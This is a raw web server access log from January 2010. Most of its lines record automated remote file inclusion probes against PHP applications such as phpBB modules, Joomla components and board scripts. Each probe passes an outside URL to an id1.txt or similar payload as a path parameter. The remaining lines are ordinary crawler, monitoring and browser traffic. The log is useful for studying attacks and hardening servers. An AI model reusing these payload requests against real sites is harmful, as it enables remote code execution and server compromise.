89.184.72.4 - - [05/Jan/2010:04:05:10 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:04:05:10 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:05:11 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:05:11 -0500] "GET /logs/error_log.Q109100300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:05:11 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:04:05:27 -0500] "GET /logs/access_log.Q109062100 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
211.218.126.236 - - [05/Jan/2010:04:05:51 -0500] "GET /logs/access_log.Q109100300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:04:06:20 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:04:06:20 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:06:23 -0500] "GET /logs/access_log.Q109090400//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:06:23 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:06:23 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:04:06:30 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:04:06:30 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:04:06:31 -0500] "GET /logs/access_log.Q109110300%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:06:52 -0500] "GET /logs/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:06:52 -0500] "GET /index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:06:52 -0500] "GET /logs/access_log.Q109072900%20%20/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:06:57 -0500] "GET /logs/access_log.Q109090900%20%20/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:06:59 -0500] "GET /index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:06:59 -0500] "GET /logs/access_log.Q109072900%20%20/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:07:00 -0500] "GET /logs/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:04:07:05 -0500] "GET /logs/access_log.Q109110300/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:07:07 -0500] "GET /logs/access_log.Q109090900%20%20/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:07:17 -0500] "GET /index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:07:17 -0500] "GET /logs/access_log.Q109101500/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:07:17 -0500] "GET /logs/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:04:07:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.160.17.200 - - [05/Jan/2010:04:07:37 -0500] "GET /index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:07:37 -0500] "GET /logs/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:07:37 -0500] "GET /logs/access_log.Q109072900%20%20/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:07:41 -0500] "GET /logs/access_log.Q109090900%20%20/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:04:07:51 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:04:07:51 -0500] "GET /logs/access_log.Q109072900//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:04:07:58 -0500] "GET //index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:07:58 -0500] "GET /logs/access_log.Q109052100/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:08:00 -0500] "GET /bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:08:00 -0500] "GET /logs/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:08:05 -0500] "GET /index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:08:05 -0500] "GET /logs/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:08:05 -0500] "GET /logs/access_log.Q109072900/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:08:11 -0500] "GET /logs/access_log.Q109052100/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:08:11 -0500] "GET /bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:08:11 -0500] "GET /logs/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:08:12 -0500] "GET /logs/error_log.Q109071800/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:08:12 -0500] "GET /index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:08:12 -0500] "GET /logs/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:08:12 -0500] "GET /logs/access_log.Q109072900/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:08:18 -0500] "GET /logs/error_log.Q109071800/index.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:04:08:22 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:04:08:22 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:04:08:23 -0500] "GET /logs/access_log.Q109110300%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:08:42 -0500] "GET /logs/access_log.Q109101600/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:08:59 -0500] "GET /logs/access_log.Q109101600/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:09:17 -0500] "GET /logs/access_log.Q109101500//index.php?DOCUMENT_ROOT=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:04:10:07 -0500] "GET /logs/access_log.Q109071400%20%20//oneadmin/photogallery/include.php?path[docroot]=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:11:19 -0500] "GET /logs/access_log.Q109112600%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:11:24 -0500] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:11:24 -0500] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:11:40 -0500] "GET /logs/error_log.Q109100200%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:11:53 -0500] "GET /bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:11:55 -0500] "GET /logs/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:11:57 -0500] "GET /logs/access_log.Q109072200/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:12:11 -0500] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:12:12 -0500] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:12:12 -0500] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:12:12 -0500] "GET /logs/access_log.Q109112600%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:12:14 -0500] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:12:15 -0500] "GET /logs/access_log.Q109112600%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:12:24 -0500] "GET /logs/error_log.Q109100200%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:04:12:28 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.93.147.154 - - [05/Jan/2010:04:12:29 -0500] "GET /logs/error_log.Q109100200%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:12:30 -0500] "GET /logs/access_log.Q109052100/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:12:30 -0500] "GET /bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:12:33 -0500] "GET /logs/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
75.126.17.250 - - [05/Jan/2010:04:12:59 -0500] "GET //micro_cms_files/index.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
75.126.17.250 - - [05/Jan/2010:04:12:59 -0500] "GET /logs/access_log.Q109112300%20%20//micro_cms_files/index.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
75.126.17.250 - - [05/Jan/2010:04:12:59 -0500] "GET /logs//micro_cms_files/index.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
75.126.17.250 - - [05/Jan/2010:04:12:59 -0500] "GET /logs/error_log.Q109112300%20%20//micro_cms_files/index.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
75.126.17.250 - - [05/Jan/2010:04:13:13 -0500] "GET /logs/access_log.Q109112300//micro_cms_files/index.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.126.17.250 - - [05/Jan/2010:04:13:13 -0500] "GET /logs/error_log.Q109112300//micro_cms_files/index.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.72.90.34 - - [05/Jan/2010:04:14:06 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.72.90.34 - - [05/Jan/2010:04:14:08 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.72.90.34 - - [05/Jan/2010:04:14:13 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.72.90.34 - - [05/Jan/2010:04:14:13 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
95.108.128.242 - - [05/Jan/2010:04:13:12 -0500] "GET /logs/access_log.Q109103000 HTTP/1.1" 200 5432399 "-" "Yandex/1.01.001 (compatible; Win16; I)"
58.72.90.34 - - [05/Jan/2010:04:14:16 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.72.90.34 - - [05/Jan/2010:04:14:16 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.249.65.7 - - [05/Jan/2010:04:14:35 -0500] "GET /images/Office%20Supply/Delete-Order.gif HTTP/1.1" 200 460 "-" "Googlebot-Image/1.0"
72.55.143.249 - - [05/Jan/2010:04:14:41 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:14:41 -0500] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:14:41 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:14:42 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:14:42 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:14:42 -0500] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:14:46 -0500] "GET /logs/access_log.Q109090300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:14:46 -0500] "GET /logs/access_log.Q109090300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.218.116.132 - - [05/Jan/2010:04:15:08 -0500] "GET /logs/error_log.Q109103000 HTTP/1.0" 200 3905953 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
58.72.90.34 - - [05/Jan/2010:04:15:24 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.72.90.34 - - [05/Jan/2010:04:15:24 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.72.90.34 - - [05/Jan/2010:04:15:30 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.72.90.34 - - [05/Jan/2010:04:15:30 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.126.17.250 - - [05/Jan/2010:04:15:31 -0500] "GET /logs/access_log.Q109101500//micro_cms_files/index.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.72.90.34 - - [05/Jan/2010:04:15:33 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.72.90.34 - - [05/Jan/2010:04:15:33 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.72.90.34 - - [05/Jan/2010:04:15:37 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.72.90.34 - - [05/Jan/2010:04:15:37 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.126.17.250 - - [05/Jan/2010:04:15:39 -0500] "GET /logs/access_log.Q109083100//micro_cms_files/index.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:15:48 -0500] "GET /logs/access_log.Q109102500//delete_all.php?board_skin_path=http://via.wen.ru/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:15:48 -0500] "GET /logs//delete_all.php?board_skin_path=http://via.wen.ru/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:15:48 -0500] "GET //delete_all.php?board_skin_path=http://via.wen.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:15:52 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:15:52 -0500] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:15:52 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:15:56 -0500] "GET /logs/access_log.Q109090300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.139.29.61 - - [05/Jan/2010:04:16:04 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
89.139.29.61 - - [05/Jan/2010:04:16:04 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
89.139.29.61 - - [05/Jan/2010:04:16:06 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
89.139.29.61 - - [05/Jan/2010:04:16:06 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Tablet PC 2.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
